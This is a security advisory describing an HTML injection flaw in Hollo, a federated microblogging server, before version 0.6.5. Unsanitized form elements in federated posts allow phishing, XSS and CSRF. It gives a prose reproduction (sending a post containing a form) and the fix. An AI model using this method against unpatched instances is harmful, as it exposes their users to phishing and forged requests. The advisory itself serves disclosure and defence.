Hollo HTML Injection Vulnerability Allowing Cross-Site Scripting

A vulnerability in Hollo, a federated microblogging software, prior to version 0.6.5, allows HTML form elements to be injected and submitted. This issue arises because the application did not properly sanitize incoming HTML before rendering, enabling the injection of forms for phishing, execution of JavaScript, or Cross-Site Request Forgery (CSRF) attacks. The vulnerability is present in all users of Hollo, as it affects the rendering of federated posts that include form elements.

Impact

Exploitation of this vulnerability could lead to Cross-Site Scripting (XSS) attacks, allowing the execution of malicious scripts in the context of the user's browser. Additionally, the injected forms could be used for phishing attacks or to perform CSRF attacks, tricking users into unintentionally submitting requests or actions.

Reproduction

To reproduce this vulnerability, receive a federated post that includes HTML form elements, such as input fields and buttons. These elements will be rendered and can be submitted, contrary to the expected behavior on most platforms, which strip out such elements before display. This issue can be demonstrated by sending a post from a WordPress site that includes a form element, such as a newsletter signup form, to a Hollo account.

Remediation

Users can update to Hollo version 0.6.5 or later, where this vulnerability has been fixed. Instructions for downloading the latest version are available on the Hollo GitHub releases page.